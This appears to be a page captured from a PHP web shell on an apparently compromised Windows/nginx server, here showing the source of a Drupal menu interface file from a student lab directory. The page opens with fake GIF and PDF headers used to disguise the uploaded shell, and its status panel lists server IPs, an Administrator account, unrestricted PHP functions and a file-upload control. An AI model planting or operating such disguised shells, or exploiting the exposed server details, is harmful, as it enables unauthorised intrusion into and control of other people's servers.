GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Menu/ |
Upload File : |
<?php namespace Drupal\Core\Menu; use Drupal\Core\Routing\RouteMatchInterface; /** * Defines an interface for menu local actions. */ interface LocalActionInterface { /** * Get the route name from the settings. * * @return string * The name of the route this action links to. */ public function getRouteName(); /** * Returns the route parameters needed to render a link for the local action. * * @param \Drupal\Core\Routing\RouteMatchInterface $route_match * The current route match. * * @return array * An array of parameter names and values. */ public function getRouteParameters(RouteMatchInterface $route_match); /** * Returns the weight for the local action. * * @return int */ public function getWeight(); /** * Returns options for rendering a link for the local action. * * @param \Drupal\Core\Routing\RouteMatchInterface $route_match * The current route match. * * @return array * An associative array of options. */ public function getOptions(RouteMatchInterface $route_match); /** * Returns the localized title to be shown for this action. * * Subclasses may add optional arguments like NodeInterface $node = NULL that * will be supplied by the ControllerResolver. * * @return string * The title to be shown for this action. * * @see \Drupal\Core\Menu\LocalActionManager::getTitle() */ public function getTitle(); }